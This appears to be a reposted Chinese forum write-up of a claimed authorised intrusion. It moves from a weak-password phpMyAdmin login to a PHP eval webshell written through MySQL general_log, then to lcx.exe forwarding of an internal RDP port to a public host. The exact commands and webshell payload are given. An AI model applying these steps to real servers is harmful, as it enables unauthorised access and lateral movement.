新手getshell到拿下内网
2020-05-09 12:14:29 Author: forum.90sec.com(查看原文) 阅读量:506 收藏

我是一个新手,希望来到90sec社区进行学习,然后分享一下自己学习过程中的知识,希望大家能够给一个来90sec学习的机会。

本次渗透有授权,然后是一篇很小白的文章,大佬们轻喷。

在网站点几条链接试试存在注入吗,意料之中,不存在注入点!

扫描器 扫出了phpmyadmin

image

弱口令进去了

image

phpmyadmin getshell方法

查看日志状态

show variables like '%general%'; 日志读写是开着的 ON是表示开启OFF表示关闭

要是 general_log OFF 那就用语句SET GLOBAL general_log='on'

开启日志读写

image

创建文件

SET GLOBAL general_log_file='C:/phpStudy/www/xxx.php'

写一句户 SELECT '<?php eval($_POST["cmd"]);?>'

image

然后就连接蚁剑 拿到了shell肯定试下提权啊

image

image

Administrator权限

查看一下ip 是内网ip如何看是不是内网ip

A类:10.0.0.0 到10.255.255.255

B类:172.16.0.0 到172.31.255.255

C类:192.168.0.0 到192.168.255.255

还有个169.254.xxx.xxx 也是

image

看看开放了什么端口

image

3389开着 刚开始不知道是内网ip直接连失败去网上找了资料

内网端口转发 --lcx.exe工具转发

被控端执行 lcx.exe -slave (公网ip) 53 172.xxx.xxx 3389 将内网3389端口转发到公网53端口;

image

本机执行 lcx.exe -listen 53 1234 已经反弹到公网53端口了 //将接收到的53端口反弹到1234端口;

image

我们本地远程连接127.0.01:1234,就可以访问到内网主机,这样我们就可以远程登陆内网服务器

image


文章来源: https://forum.90sec.com/t/topic/1011/1
如有侵权请联系:admin#unsafe.sh